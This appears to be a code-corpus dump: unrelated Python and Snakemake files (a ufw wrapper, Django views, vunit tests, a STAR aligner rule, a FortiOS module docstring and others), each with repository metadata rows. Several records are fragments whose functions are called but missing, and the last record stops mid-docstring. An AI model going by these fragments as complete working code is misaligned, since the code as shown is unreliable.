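# authorization-URL builder these constants typically feed; the scope and
# redirect choices below are assumptions, not the original app's values.
def authorization_url():
    return (
        f"{STRAVA_AUTHORIZATION_URL}"
        f"?client_id={STRAVA_CLIENT_ID}"
        f"&redirect_uri={APP_URL}"
        "&response_type=code"
        "&scope=activity:read_all"
    )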
| 27.552632 | 120 | 0.641356 |
6a3376e3801e88076e88946747dfd57658118979
| 3,395 |
py
|
Python
|
appliance/src/ufw_interface.py
|
reap3r/nmfta-bouncer
|
a178244dbf0b8a165aabc02a5d1ba05006f9ec22
|
[
"Apache-2.0"
] | 1 |
2019-01-10T00:31:09.000Z
|
2019-01-10T00:31:09.000Z
|
appliance/src/ufw_interface.py
|
nmfta-repo/nmfta-bouncer
|
a178244dbf0b8a165aabc02a5d1ba05006f9ec22
|
[
"Apache-2.0"
] | 21 |
2019-02-28T14:23:11.000Z
|
2020-07-07T20:46:37.000Z
|
appliance/src/ufw_interface.py
|
nmfta-repo/nmfta-bouncer
|
a178244dbf0b8a165aabc02a5d1ba05006f9ec22
|
[
"Apache-2.0"
] | 2 |
2019-05-07T13:16:49.000Z
|
2020-06-23T13:49:01.000Z
|
#!/usr/bin/env python
#shamelessy stolen from: https://gitlab.com/dhj/easyufw
# A thin wrapper over the thin wrapper that is ufw
# Usage:
# import easyufw as ufw
# ufw.disable() # disable firewall
# ufw.enable() # enable firewall
# ufw.allow() # default allow -- allow all
# ufw.allow(22) # allow port 22, any protocol
# ufw.allow(22,'tcp') # allow port 22, tcp protocol
# ufw.allow('22/tcp') # allow port 22, tcp protocol
# ufw.allow(53,'udp') # allow port 53, udp protocol
# ufw.allow(53,'udp') # allow port 53, udp protocol
# ufw.deny() # default deny -- deny all
# ufw.deny(22,'tcp') # deny port 22, tcp protocol
# ufw.delete(22) # delete rules referencing port 22
# ufw.reset() # restore defaults
# ufw.status() # return status string (default verbose=True)
# ufw.run("allow 22") # directly run command as if from command line
import ufw.frontend
import ufw.common
import gettext
progName = ufw.common.programName
gettext.install(progName)#, unicode=True) # for i18n; fixes '_' not defined
ui = ufw.frontend.UFWFrontend(False) # no dryrun -- do it live
backend = ui.backend
parse_command = ufw.frontend.parse_command
| 29.267241 | 77 | 0.620619 |
6a33b81f30e4d4f06b72174eedd941785bd5b519
| 1,325 |
py
|
Python
|
test/libsalt/test_vehicle.py
|
etri-city-traffic-brain/traffic-simulator
|
6d5061febeaef484388b2b5aee14d9894099d98a
|
[
"Apache-2.0"
] | 8 |
2020-08-27T05:44:05.000Z
|
2021-12-27T05:11:17.000Z
|
test/libsalt/test_vehicle.py
|
etri-city-traffic-brain/traffic-simulator
|
6d5061febeaef484388b2b5aee14d9894099d98a
|
[
"Apache-2.0"
] | null | null | null |
test/libsalt/test_vehicle.py
|
etri-city-traffic-brain/traffic-simulator
|
6d5061febeaef484388b2b5aee14d9894099d98a
|
[
"Apache-2.0"
] | 1 |
2020-11-27T05:17:29.000Z
|
2020-11-27T05:17:29.000Z
|
import libsalt
# for vehicle in runnings:
# print("Running Vehicle)", vehicle.id, ":", libsalt.vehicle.getRoute(vehicle.id).toString())
# print("Running Vehicle)", vehicle.id, ":", vehicle.toString())
#print("#Standby Vehicles: ", len(standbys))
#for vehicle in standbys:
# print("Standby Vehicle)", vehicle.id, ":", libsalt.vehicle.getRouteString(vehicle.id))
#print("Standby Vehicle)", vehicle.id, ":", vehicle.toString())
if __name__ == "__main__":
salt_scenario = r"/home/mclee/project/traffic-simulator/data/dj_sample_data/2020-dj_sample.json"
test(salt_scenario)
| 33.125 | 101 | 0.648302 |
6a35d2e3dec4c05f542fce0db1d5d23465661584
| 8,348 |
py
|
Python
|
Masters/Copy Layer to Layer.py
|
davidtahim/Glyphs-Scripts
|
5ed28805b5fe03c63d904ad2f79117844c22aa44
|
[
"Apache-2.0"
] | 1 |
2021-09-04T18:41:30.000Z
|
2021-09-04T18:41:30.000Z
|
Masters/Copy Layer to Layer.py
|
davidtahim/Glyphs-Scripts
|
5ed28805b5fe03c63d904ad2f79117844c22aa44
|
[
"Apache-2.0"
] | null | null | null |
Masters/Copy Layer to Layer.py
|
davidtahim/Glyphs-Scripts
|
5ed28805b5fe03c63d904ad2f79117844c22aa44
|
[
"Apache-2.0"
] | null | null | null |
#MenuTitle: Copy Layer to Layer
# -*- coding: utf-8 -*-
__doc__="""
Copies one master to another master in selected glyphs.
"""
import GlyphsApp
import vanilla
import math
MasterFiller()
| 36.295652 | 152 | 0.713464 |
6a362d5ac32fdf3188152eb3fc2c0b00c7db0458
| 3,080 |
py
|
Python
|
vunit/test/unit/test_tokenizer.py
|
bjacobs1/vunit
|
a7f7717a172855ea7852296bb768370d50cfc992
|
[
"Artistic-2.0"
] | 1 |
2020-08-30T08:30:02.000Z
|
2020-08-30T08:30:02.000Z
|
vunit/test/unit/test_tokenizer.py
|
smgl9/vunit
|
9933d9a1ae600cc241894244361282dd7f7227d7
|
[
"Artistic-2.0"
] | null | null | null |
vunit/test/unit/test_tokenizer.py
|
smgl9/vunit
|
9933d9a1ae600cc241894244361282dd7f7227d7
|
[
"Artistic-2.0"
] | null | null | null |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Copyright (c) 2014-2018, Lars Asplund [email protected]
"""
Test of the general tokenizer
"""
from unittest import TestCase
from vunit.parsing.tokenizer import describe_location
from vunit.test.mock_2or3 import mock
def _describe_location(*codes):
"""
Helper to test describe_location
"""
contents = {}
location = None
for idx, code in enumerate(codes):
filename = "filename%i" % idx
contents[filename] = code
start = code.index("S")
if "E" in code:
end = code.index("E")
else:
end = start
        location = ((filename, (start, end)), location)

    # The two side-effect helpers patched in below were dropped from this
    # dump; reconstructed here, as an assumption, from how they are used.
    def file_exists_side_effect(filename):
        return filename in contents

    def read_file_side_effect(filename):
        return contents[filename]
with mock.patch("vunit.parsing.tokenizer.read_file", autospec=True) as mock_read_file:
with mock.patch("vunit.parsing.tokenizer.file_exists", autospec=True) as mock_file_exists:
mock_file_exists.side_effect = file_exists_side_effect
mock_read_file.side_effect = read_file_side_effect
retval = describe_location(location=location)
return retval
| 24.64 | 98 | 0.622727 |
6a3682a6dc34888138320be2d7fc9fac096c4fc7
| 1,962 |
py
|
Python
|
modules/star_se_SP.py
|
tbersez/Allmine
|
092fb1f5abcb4fd4e40b4a25386f05ecb2dea55b
|
[
"MIT"
] | 5 |
2019-02-13T13:47:24.000Z
|
2019-04-27T18:27:03.000Z
|
modules/star_se_SP.py
|
tbersez/Allmine
|
092fb1f5abcb4fd4e40b4a25386f05ecb2dea55b
|
[
"MIT"
] | null | null | null |
modules/star_se_SP.py
|
tbersez/Allmine
|
092fb1f5abcb4fd4e40b4a25386f05ecb2dea55b
|
[
"MIT"
] | null | null | null |
# STAR aligner single end mode, second pass
#
# This module runs the second pass of the STAR aligner 2 path
# strategy. The goal is to align reads taking in account splice
# junction found in the fist pass..
#
# Inputs:
# - sample_trim.fastq.gz
# - splicing junction files (.tab)
#
# Output:
# - aligned reads
# - logs for follow up and debuging if needed
#
# Parameters:
# No fancy parameters needed, only the threads number is specified.
rule star_se_SP:
input:
# fake input
flag = ancient(config["REF"] + "REindexing_done.txt"),
R1 = config["TRIMMED"] + "{samples}_trim.fastq.gz",
genomeDir = ancient(config["REF"])
output:
bam = config["MAP"] + "{samples}_sorted.bam.gz"
params:
prefix = config["MAP"] + "{samples}.",
tmp = config["MAP"] + "SP/" + "{samples}_sp_STAR_TMP",
bind = config["BIND"],
cont = config["CONT"]
benchmark:
"benchmarks/star_SP/{samples}.tsv"
message : "Running STAR second pass with {input.R1}. \n"
shell:
"""
singularity exec -B {params.bind} {params.cont} \
STAR \
--runThreadN 10 \
--genomeDir {input.genomeDir} \
--readFilesIn {input.R1} \
--outSAMtype BAM SortedByCoordinate \
--outFileNamePrefix {params.prefix} \
--outStd BAM_SortedByCoordinate \
--outTmpDir {params.tmp} \
--scoreGap 0 \
--scoreGapNoncan -8 \
--scoreGapGCAG -4 \
--scoreGapATAC -8 \
--scoreGenomicLengthLog2scale -0.25 \
--scoreDelOpen -2 \
--scoreDelBase -2 \
--scoreInsOpen -2 \
--scoreInsBase -2 \
--scoreStitchSJshift 1 \
--readFilesCommand zcat | gzip --stdout > {output.bam}
"""
| 34.421053 | 73 | 0.5316 |
6a36b0c35f3000da705fd087f744d451ba48d8fd
| 531 |
py
|
Python
|
Udemy/REST-Django-VueJS/C3-practice/03-demo/job_board/jobs/models.py
|
runzezhang/MOOCs
|
8df8c7adc5af3d7b085be01ae9b6963fe33acd68
|
[
"Apache-2.0"
] | 3 |
2019-04-05T18:59:53.000Z
|
2020-09-24T09:05:46.000Z
|
Udemy/REST-Django-VueJS/C3-practice/03-demo/job_board/jobs/models.py
|
runzezhang/MOOCs
|
8df8c7adc5af3d7b085be01ae9b6963fe33acd68
|
[
"Apache-2.0"
] | null | null | null |
Udemy/REST-Django-VueJS/C3-practice/03-demo/job_board/jobs/models.py
|
runzezhang/MOOCs
|
8df8c7adc5af3d7b085be01ae9b6963fe33acd68
|
[
"Apache-2.0"
] | 1 |
2019-02-10T13:35:36.000Z
|
2019-02-10T13:35:36.000Z
|
from django.db import models
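# The model definitions were truncated in this dump. A minimal sketch of a plausible
# job-board model (the class and field names are assumptions):
class Job(models.Model):
    title = models.CharField(max_length=255)
    description = models.TextField()
    posted_at = models.DateTimeField(auto_now_add=True)
    def __str__(self):
        return self.title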
| 31.235294 | 52 | 0.73823 |
6a3701a8c1a4900d3599d12821235a51d12e4737
| 4,926 |
py
|
Python
|
memeapp/views.py
|
barbaramootian/Memes-app
|
4ffa2da997758ee4f35dc21e755e3db242b8654f
|
[
"MIT",
"Unlicense"
] | null | null | null |
memeapp/views.py
|
barbaramootian/Memes-app
|
4ffa2da997758ee4f35dc21e755e3db242b8654f
|
[
"MIT",
"Unlicense"
] | null | null | null |
memeapp/views.py
|
barbaramootian/Memes-app
|
4ffa2da997758ee4f35dc21e755e3db242b8654f
|
[
"MIT",
"Unlicense"
] | null | null | null |
from django.shortcuts import render,redirect
from django.contrib.auth.models import User
from django.contrib import messages
from .forms import PictureUploadForm,CommentForm
from .models import Image,Profile,Likes,Comments
from django.contrib.auth.decorators import login_required
from django.contrib .auth import authenticate,login,logout
from django.contrib.auth.forms import UserCreationForm
from datetime import datetime
def search(request):
title = "Search"
if 'search_query' in request.GET and request.GET["search_query"]:
search_term = request.GET.get("search_query").lower()
searched_results = Image.search_image(search_term)
message = f"{search_term}"
context = {'message': message, 'results': searched_results, 'title': title}
return render(request, 'memeapp/search.html', context)
else:
messages.error(request, "You haven't searched for any term")
message = "You haven't searched for any term"
return render(request, 'memeapp/search.html', {"message": message})
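# The view above relies on Image.search_image(); a minimal sketch of such a classmethod
# (the `image_name` field is an assumption — shown commented out since Image is imported
# from .models above):
# @classmethod
# def search_image(cls, search_term):
#     return cls.objects.filter(image_name__icontains=search_term)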
| 35.695652 | 108 | 0.664434 |
6a3712991b980a6711c1dba6adf131ce5c5af892
| 4,997 |
py
|
Python
|
sparv/modules/hist/diapivot.py
|
spraakbanken/sparv-pipeline
|
7293d42c577afdaf01ce8a936743f8b83d6eb962
|
[
"MIT"
] | 17 |
2018-09-21T07:01:45.000Z
|
2022-02-24T23:26:49.000Z
|
sparv/modules/hist/diapivot.py
|
spraakbanken/sparv-pipeline
|
7293d42c577afdaf01ce8a936743f8b83d6eb962
|
[
"MIT"
] | 146 |
2018-11-13T19:13:25.000Z
|
2022-03-31T09:57:56.000Z
|
sparv/modules/hist/diapivot.py
|
spraakbanken/sparv-pipeline
|
7293d42c577afdaf01ce8a936743f8b83d6eb962
|
[
"MIT"
] | 5 |
2019-02-14T00:50:38.000Z
|
2021-03-29T15:37:41.000Z
|
"""Create diapivot annotation."""
import logging
import pickle
import xml.etree.ElementTree as etree
import sparv.util as util
from sparv import Annotation, Model, ModelOutput, Output, annotator, modelbuilder
log = logging.getLogger(__name__)
PART_DELIM1 = "^1"
# @annotator("Diapivot annotation", language=["swe-1800"])
def diapivot_annotate(out: Output = Output("<token>:hist.diapivot", description="SALDO IDs corresponding to lemgrams"),
lemgram: Annotation = Annotation("<token>:saldo.lemgram"),
model: Model = Model("hist/diapivot.pickle")):
"""Annotate each lemgram with its corresponding saldo_id according to model.
Args:
out (str, optional): Resulting annotation file.
Defaults to Output("<token>:hist.diapivot", description="SALDO IDs corresponding to lemgrams").
lemgram (str, optional): Existing lemgram annotation. Defaults to Annotation("<token>:saldo.lemgram").
model (str, optional): Crosslink model. Defaults to Model("hist/diapivot.pickle").
"""
lexicon = PivotLexicon(model)
lemgram_annotation = list(lemgram.read())
out_annotation = []
for lemgrams in lemgram_annotation:
saldo_ids = []
for lemgram in lemgrams.split(util.DELIM):
s_i = lexicon.get_exactMatch(lemgram)
if s_i:
saldo_ids += [s_i]
out_annotation.append(util.AFFIX + util.DELIM.join(set(saldo_ids)) + util.AFFIX if saldo_ids else util.AFFIX)
out.write(out_annotation)
# @modelbuilder("Diapivot model", language=["swe"])
def build_diapivot(out: ModelOutput = ModelOutput("hist/diapivot.pickle")):
"""Download diapivot XML dictionary and save as a pickle file."""
# Download diapivot.xml
xml_model = Model("hist/diapivot.xml")
xml_model.download("https://svn.spraakdata.gu.se/sb-arkiv/pub/lmf/diapivot/diapivot.xml")
# Create pickle file
xml_lexicon = read_xml(xml_model.path)
log.info("Saving cross lexicon in Pickle format")
picklex = {}
for lem in xml_lexicon:
lemgrams = []
for saldo, match in list(xml_lexicon[lem].items()):
lemgrams.append(PART_DELIM1.join([saldo, match]))
picklex[lem] = sorted(lemgrams)
out.write_pickle(picklex)
# Clean up
xml_model.remove()
################################################################################
# Auxiliaries
################################################################################
def read_xml(xml):
"""Read the XML version of crosslinked lexicon."""
log.info("Reading XML lexicon")
lexicon = {}
context = etree.iterparse(xml, events=("start", "end")) # "start" needed to save reference to root element
context = iter(context)
_event, root = next(context)
for event, elem in context:
if event == "end":
if elem.tag == 'LexicalEntry':
lemma = elem.find("Lemma")
dalin, saldo = [], ''
for form in lemma.findall("FormRepresentation"):
cat = _findval(form, "category")
lem = _findval(form, "lemgram")
if cat == "modern":
saldo = lem
else:
match = _findval(form, "match")
dalin += [(lem, match)]
[lexicon.update({d: {'saldo': saldo, 'match': m}}) for (d, m) in dalin]
# Done parsing section. Clear tree to save memory
if elem.tag in ['LexicalEntry', 'frame', 'resFrame']:
root.clear()
testwords = ["tigerhjerta..nn.1",
"lgland..nn.1",
"gud..nn.1"]
util.test_lexicon(lexicon, testwords)
log.info("OK, read")
return lexicon
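def _findval(elements, key):
    """Return the 'val' attribute of the child element whose 'att' equals key.
    (Reconstructed from how it is called in read_xml above; may differ from the repo.)"""
    for element in elements:
        if element.get("att") == key:
            return element.get("val")
    return ""
class PivotLexicon:
    """Minimal sketch of the lexicon wrapper used by diapivot_annotate above, reconstructed
    from the pickle layout written by build_diapivot; the 'exactMatch' label is an assumption."""
    def __init__(self, model):
        with open(model.path, "rb") as infile:
            self.lexicon = pickle.load(infile)
    def get_exactMatch(self, lemgram):
        for entry in self.lexicon.get(lemgram, []):
            saldo, match = entry.split(PART_DELIM1)
            if match == "exactMatch":
                return saldo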
| 33.313333 | 119 | 0.58295 |
6a37f82fb39de7a27271cf8fb84d1b4b6b384c9f
| 534 |
py
|
Python
|
src/xbot/util/path.py
|
xinyang178/xbot
|
dad1fc67062dc6fd21802899fd68f7eb91c96569
|
[
"MIT"
] | 77 |
2020-10-27T12:19:01.000Z
|
2022-03-16T09:13:17.000Z
|
src/xbot/util/path.py
|
xinyang178/xbot
|
dad1fc67062dc6fd21802899fd68f7eb91c96569
|
[
"MIT"
] | 7 |
2020-12-09T14:05:07.000Z
|
2021-04-28T02:37:05.000Z
|
src/xbot/util/path.py
|
xinyang178/xbot
|
dad1fc67062dc6fd21802899fd68f7eb91c96569
|
[
"MIT"
] | 45 |
2020-09-24T07:28:32.000Z
|
2022-03-03T17:09:04.000Z
|
import os
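# The helper definitions were truncated in this dump. A plausible minimal helper for a
# util/path.py module (the function name is an assumption):
def get_root_path():
    """Project root, assuming this file lives at <root>/src/xbot/util/path.py."""
    return os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))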
| 24.272727 | 87 | 0.666667 |
6a3848493b2b327c8b213a833273765a92b0f3b9
| 274 |
py
|
Python
|
home/website/wagtail_hooks.py
|
HackSoftware/hackconf.bg
|
ab3cc9fcdccf8991098553e0374103e3a241ce50
|
[
"MIT"
] | 12 |
2017-03-29T11:55:20.000Z
|
2022-03-29T20:03:41.000Z
|
kdl_wagtail/wagtail_hooks.py
|
kingsdigitallab/archetype-django
|
6315c8f38e873e2d3b2d99fcfd47d01ce0ae35bc
|
[
"MIT"
] | 8 |
2020-06-05T18:16:24.000Z
|
2021-09-07T23:53:11.000Z
|
kdl_wagtail/wagtail_hooks.py
|
kingsdigitallab/archetype-django
|
6315c8f38e873e2d3b2d99fcfd47d01ce0ae35bc
|
[
"MIT"
] | 2 |
2018-03-31T15:06:55.000Z
|
2019-06-25T16:22:08.000Z
|
from django.utils.html import format_html
from wagtail.wagtailcore import hooks
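# The hook registrations were truncated in this dump. A minimal example of the pattern
# these two imports support (the stylesheet path is a placeholder):
@hooks.register('insert_editor_css')
def editor_css():
    return format_html('<link rel="stylesheet" href="{}">', '/static/css/editor.css')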
| 19.571429 | 45 | 0.624088 |
6a388679dce82d3f7e5c312799aab790d1280f39
| 440 |
py
|
Python
|
src/reporter/tests/test_api.py
|
msgis/ngsi-timeseries-api
|
5cc7a8beab748cecfd5fba61740f3730361d4e31
|
[
"MIT"
] | null | null | null |
src/reporter/tests/test_api.py
|
msgis/ngsi-timeseries-api
|
5cc7a8beab748cecfd5fba61740f3730361d4e31
|
[
"MIT"
] | null | null | null |
src/reporter/tests/test_api.py
|
msgis/ngsi-timeseries-api
|
5cc7a8beab748cecfd5fba61740f3730361d4e31
|
[
"MIT"
] | null | null | null |
from conftest import QL_URL
import requests
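# The test bodies were truncated in this dump. A minimal sketch of the kind of smoke test
# these imports support (asserting only on the status code, which is an assumption):
def test_api_root_is_up():
    r = requests.get('{}'.format(QL_URL))
    assert r.status_code == 200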
| 29.333333 | 53 | 0.543182 |
6a38ce0ec26e60d5ad5f137d860bd186bef4c8e7
| 1,981 |
py
|
Python
|
zorg/buildbot/conditions/FileConditions.py
|
dyung/llvm-zorg
|
42cd139968388b14323975647faf322c99945986
|
[
"Apache-2.0"
] | 27 |
2019-01-15T03:03:58.000Z
|
2022-03-22T23:31:36.000Z
|
zorg/buildbot/conditions/FileConditions.py
|
dyung/llvm-zorg
|
42cd139968388b14323975647faf322c99945986
|
[
"Apache-2.0"
] | 21 |
2020-05-29T01:12:26.000Z
|
2022-03-29T20:06:22.000Z
|
zorg/buildbot/conditions/FileConditions.py
|
dyung/llvm-zorg
|
42cd139968388b14323975647faf322c99945986
|
[
"Apache-2.0"
] | 38 |
2019-02-10T02:46:33.000Z
|
2022-03-26T10:27:29.000Z
|
from buildbot.process.remotecommand import RemoteCommand
from buildbot.interfaces import WorkerTooOldError
import stat
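# The condition classes were truncated in this dump. The stat import suggests checks of a
# worker-side stat() result like the following (a sketch, not the repo's exact code):
def _is_regular_file(stat_result):
    """True if a stat tuple (as returned by buildbot's remote 'stat' command) describes a regular file."""
    return stat.S_ISREG(stat_result[stat.ST_MODE])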
| 30.476923 | 78 | 0.655729 |
6a39601bd5d34aa0ef10ce85dcff9883e1a2620c
| 6,349 |
py
|
Python
|
gym_combat/gym_combat/envs/main.py
|
refaev/combat_gym
|
f02fcf98e95a1dda29cdddd4ae271de3e18ea3bf
|
[
"MIT"
] | null | null | null |
gym_combat/gym_combat/envs/main.py
|
refaev/combat_gym
|
f02fcf98e95a1dda29cdddd4ae271de3e18ea3bf
|
[
"MIT"
] | null | null | null |
gym_combat/gym_combat/envs/main.py
|
refaev/combat_gym
|
f02fcf98e95a1dda29cdddd4ae271de3e18ea3bf
|
[
"MIT"
] | null | null | null |
from matplotlib import style
from tqdm import tqdm
style.use("ggplot")
from gym_combat.envs.Arena.CState import State
from gym_combat.envs.Arena.Entity import Entity
from gym_combat.envs.Arena.Environment import Environment, Episode
from gym_combat.envs.Common.constants import *
from gym_combat.envs.Qtable import Qtable_DecisionMaker
from gym_combat.envs.DQN import DQNAgent_keras
from gym_combat.envs.Greedy import Greedy_player
import matplotlib.pyplot as plt
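# The helper definitions were truncated in this dump; hypothetical minimal stand-ins so
# the entry point below is readable (the evaluation cadence is an assumption;
# SAVE_STATS_EVERY comes from Common.constants, imported above):
def evaluate(episode):
    return episode % SAVE_STATS_EVERY == 0
def print_start_of_game_info(blue_decision_maker, red_decision_maker):
    print("Blue player:", blue_decision_maker.type(), "| Red player:", red_decision_maker.type())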
if __name__ == '__main__':
env = Environment(IS_TRAINING)
print("Starting Blue player")
blue_decision_maker = DQNAgent_keras.DQNAgent_keras()
#blue_decision_maker = DQNAgent_keras.DQNAgent_keras(UPDATE_CONTEXT=True, path_model_to_load='conv1(6_6_1_256)_conv2(4_4_256_128)_conv3(3_3_128_128)_flatten_fc__blue_202001_ 0.95max_ -0.04avg_ -3.10min__1620558885.model')
print("Starting red player")
### Red Decision Maker
red_decision_maker = Greedy_player.Greedy_player()
env.blue_player = Entity(blue_decision_maker)
env.red_player = Entity(red_decision_maker)
print_start_of_game_info(blue_decision_maker, red_decision_maker)
NUM_OF_EPISODES = env.NUMBER_OF_EPISODES
for episode in tqdm(range(1, NUM_OF_EPISODES + 1), ascii=True, unit='episodes'):
EVALUATE = evaluate(episode)
current_episode = Episode(episode, EVALUATE, show_always=False if IS_TRAINING else True)
# set new start position for the players
env.reset_game(episode)
# get observation
observation_for_blue_s0: State = env.get_observation_for_blue()
action_blue = -1
# initialize the decision_makers for the players
blue_decision_maker.set_initial_state(observation_for_blue_s0, episode)
#red_decision_maker.set_initial_state(observation_for_red_s0, episode) # for non-greedy players
blue_won_the_game = False
red_won_the_game = False
for steps_current_game in range(1, MAX_STEPS_PER_EPISODE + 1):
##### Blue's turn! #####
observation_for_blue_s0: State = env.get_observation_for_blue()
current_episode.print_episode(env, steps_current_game)
action_blue: AgentAction = blue_decision_maker.get_action(observation_for_blue_s0, EVALUATE)
env.take_action(Color.Blue, action_blue) # take the action!
current_episode.print_episode(env, steps_current_game)
current_episode.is_terminal = (env.compute_terminal(whos_turn=Color.Blue) is not WinEnum.NoWin)
if current_episode.is_terminal:# Blue won the game!
blue_won_the_game=True
else:
##### Red's turn! #####
observation_for_red_s0: State = env.get_observation_for_red()
action_red: AgentAction = red_decision_maker.get_action(observation_for_red_s0, EVALUATE)
env.take_action(Color.Red, action_red) # take the action!
current_episode.is_terminal = (env.compute_terminal(whos_turn=Color.Red) is not WinEnum.NoWin)
                if current_episode.is_terminal:  # Red won the game!
red_won_the_game = True
current_episode.print_episode(env, steps_current_game)
reward_step_blue, reward_step_red = env.handle_reward(steps_current_game)
current_episode.episode_reward_red += reward_step_red
current_episode.episode_reward_blue += reward_step_blue
observation_for_blue_s1: State = env.get_observation_for_blue()
blue_decision_maker.update_context(observation_for_blue_s0, action_blue, reward_step_blue, observation_for_blue_s1,
current_episode.is_terminal, EVALUATE)
if steps_current_game == MAX_STEPS_PER_EPISODE:
# if we exited the loop because we reached MAX_STEPS_PER_EPISODE
current_episode.is_terminal = True
if blue_won_the_game or red_won_the_game:
break
# for statistics
env.update_win_counters(steps_current_game)
env.data_for_statistics(current_episode.episode_reward_blue, current_episode.episode_reward_red, steps_current_game, blue_decision_maker.get_epsolon())
env.evaluate_info(EVALUATE, episode, steps_current_game, blue_decision_maker.get_epsolon())
if current_episode.episode_number % SAVE_STATS_EVERY == 0:
if False:#blue_decision_maker.type()== AgentType.DQN_keras or blue_decision_maker.type() == AgentType.DQN_basic:
blue_decision_maker._decision_maker.print_model(observation_for_blue_s0, episode, "conv")#env.save_folder_path)
# print info of episode:
current_episode.print_info_of_episode(env, steps_current_game, blue_decision_maker.get_epsolon(), episode)
env.end_run()
if blue_decision_maker.type() == AgentType.DQN_keras or blue_decision_maker.type() == AgentType.DQN_basic:
blue_decision_maker._decision_maker.print_model(observation_for_blue_s0, episode, env.save_folder_path)
| 42.326667 | 229 | 0.723106 |
6a3afdedc7e9000d89eef5155bbd1cbb9eab9c08
| 4,132 |
py
|
Python
|
libqif/core/hyper.py
|
ramongonze/libqif
|
57be74a2342a303da5415a3d787855b8115e58f8
|
[
"MIT"
] | 2 |
2021-10-16T17:34:58.000Z
|
2021-11-16T16:15:13.000Z
|
libqif/core/hyper.py
|
ramongonze/libqif
|
57be74a2342a303da5415a3d787855b8115e58f8
|
[
"MIT"
] | null | null | null |
libqif/core/hyper.py
|
ramongonze/libqif
|
57be74a2342a303da5415a3d787855b8115e58f8
|
[
"MIT"
] | null | null | null |
"""Hyper-distributions."""
from libqif.core.secrets import Secrets
from libqif.core.channel import Channel
from numpy import array, arange, zeros
from numpy import delete as npdelete
| 37.225225 | 114 | 0.609874 |
6a3b1a3262144d987829d88570c7ef9a23bfd4a5
| 53,568 |
py
|
Python
|
ansible/venv/lib/python2.7/site-packages/ansible/modules/network/fortios/fortios_system_virtual_wan_link.py
|
gvashchenkolineate/gvashchenkolineate_infra_trytravis
|
0fb18850afe0d8609693ba4b23f29c7cda17d97f
|
[
"MIT"
] | 17 |
2017-06-07T23:15:01.000Z
|
2021-08-30T14:32:36.000Z
|
ansible/venv/lib/python2.7/site-packages/ansible/modules/network/fortios/fortios_system_virtual_wan_link.py
|
gvashchenkolineate/gvashchenkolineate_infra_trytravis
|
0fb18850afe0d8609693ba4b23f29c7cda17d97f
|
[
"MIT"
] | 32 |
2018-10-09T04:13:42.000Z
|
2020-05-11T07:20:28.000Z
|
ansible/venv/lib/python2.7/site-packages/ansible/modules/network/fortios/fortios_system_virtual_wan_link.py
|
gvashchenkolineate/gvashchenkolineate_infra_trytravis
|
0fb18850afe0d8609693ba4b23f29c7cda17d97f
|
[
"MIT"
] | 11 |
2018-10-09T00:14:53.000Z
|
2021-11-03T10:54:09.000Z
|
#!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_system_virtual_wan_link
short_description: Configure redundant internet connections using SD-WAN (formerly virtual WAN link) in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS (FOS) device by allowing the
user to set and modify system feature and virtual_wan_link category.
Examples include all parameters and values need to be adjusted to datasources before usage.
Tested with FOS v6.0.5
version_added: "2.8"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate IP address.
type: str
required: false
username:
description:
- FortiOS or FortiGate username.
type: str
required: false
password:
description:
- FortiOS or FortiGate password.
type: str
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
type: str
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS protocol.
type: bool
default: true
ssl_verify:
description:
- Ensures FortiGate certificate must be verified by a proper CA.
type: bool
default: true
version_added: 2.9
system_virtual_wan_link:
description:
- Configure redundant internet connections using SD-WAN (formerly virtual WAN link).
default: null
type: dict
suboptions:
fail_alert_interfaces:
description:
- Physical interfaces that will be alerted.
type: list
suboptions:
name:
description:
- Physical interface name. Source system.interface.name.
required: true
type: str
fail_detect:
description:
- Enable/disable SD-WAN Internet connection status checking (failure detection).
type: str
choices:
- enable
- disable
health_check:
description:
- SD-WAN status checking or health checking. Identify a server on the Internet and determine how SD-WAN verifies that the FortiGate can
communicate with it.
type: list
suboptions:
addr_mode:
description:
- Address mode (IPv4 or IPv6).
type: str
choices:
- ipv4
- ipv6
failtime:
description:
- Number of failures before server is considered lost (1 - 3600).
type: int
http_agent:
description:
- String in the http-agent field in the HTTP header.
type: str
http_get:
description:
- URL used to communicate with the server if the protocol if the protocol is HTTP.
type: str
http_match:
description:
- Response string expected from the server if the protocol is HTTP.
type: str
interval:
description:
- Status check interval, or the time between attempting to connect to the server (1 - 3600 sec).
type: int
members:
description:
- Member sequence number list.
type: list
suboptions:
seq_num:
description:
- Member sequence number. Source system.virtual-wan-link.members.seq-num.
type: int
name:
description:
- Status check or health check name.
required: true
type: str
packet_size:
description:
- Packet size of a twamp test session,
type: int
password:
description:
- Twamp controller password in authentication mode
type: str
port:
description:
- Port number used to communicate with the server over the selected protocol.
type: int
protocol:
description:
- Protocol used to determine if the FortiGate can communicate with the server.
type: str
choices:
- ping
- tcp-echo
- udp-echo
- http
- twamp
- ping6
recoverytime:
description:
- Number of successful responses received before server is considered recovered (1 - 3600).
type: int
security_mode:
description:
- Twamp controller security mode.
type: str
choices:
- none
- authentication
server:
description:
- IP address or FQDN name of the server.
type: str
sla:
description:
- Service level agreement (SLA).
type: list
suboptions:
id:
description:
- SLA ID.
required: true
type: int
jitter_threshold:
description:
- Jitter for SLA to make decision in milliseconds. (0 - 10000000).
type: int
latency_threshold:
description:
